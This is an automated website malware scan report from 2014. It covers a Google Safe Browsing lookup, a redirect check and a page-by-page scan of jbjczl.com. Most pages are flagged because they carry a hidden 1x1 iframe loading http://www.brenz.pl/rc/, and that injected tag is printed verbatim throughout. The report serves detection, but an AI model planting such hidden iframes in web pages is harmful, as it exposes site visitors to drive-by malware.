Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dfabjc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homeradio951.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 29 Apr 2014 21:10:11 GMT
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 10722
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...10722 bytes of data.
GET / HTTP/1.1
Host: homeradio951.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 29 Apr 2014 21:10:11 GMT
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 10722
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...10722 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: homeradio951.net
Referer: http://www.google.com/search?q=homeradio951.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: homeradio951.net
Referer: http://www.google.com/search?q=homeradio951.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.dfabjc.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 09 Aug 2014 16:05:27 GMT Location: http://www.jbjczl.com Server: nginx Content-Type: text/html X-Powered-By: PHP/5.3.10-1ubuntu3.10 | malicious |
http://www.jbjczl.com/ | 200 OK Content-Length: 21227 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: webmail.jbjczl.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>±±¾©Êо©°î½¨ÖþÆ÷²Ä×âÁÞ¹«Ë¾</title> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; backg ...[4633 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/index.asp | 200 OK Content-Length: 33494 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: webmail.jbjczl.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>±±¾©Êо©°î½¨ÖþÆ÷²Ä×âÁÞ¹«Ë¾</title> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; backg ...[4710 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/about.asp | 200 OK Content-Length: 9641 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/pin.asp | 200 OK Content-Length: 17639 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/zlyw.asp | 200 OK Content-Length: 9120 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/news.asp | 200 OK Content-Length: 15053 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/rongyu.asp | 200 OK Content-Length: 9647 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/liuyan.asp | 200 OK Content-Length: 12076 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/contact.asp | 200 OK Content-Length: 9335 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.dfabjc.com ...[2971 bytes skipped]... r/> ¡¡µç¡¡»°£º 010-61243730<br> ¡¡¡¡ ´«¡¡Õ棺 010-61243730<br> ¡¡ ¡¡×âÁÞÈÈÏߣº 13601066097¡¡13911788399¡¡13911659800<br> ¡¡ ¡¡E-mail:bj@jbjczl.com¡¡<br> ¡¡¡¡ http://www.jbjczl.com www.dfabjc.com</td> </tr> </table> <p> </p> </td> </tr> </table></td> </tr> <tr> <td><img src="images/neiye01_34.jpg" width="660" height="23"></td> </tr> </table></td> </tr> </table> <table width="924" h ...[1098 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/pin2.asp | 200 OK Content-Length: 12682 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/pin5.asp | 200 OK Content-Length: 17552 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/pin6.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.jbjczl.com/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://www.jbjczl.com/pin7.asp | 200 OK Content-Length: 16438 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jbjczl.com/pin3.asp | 200 OK Content-Length: 14554 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |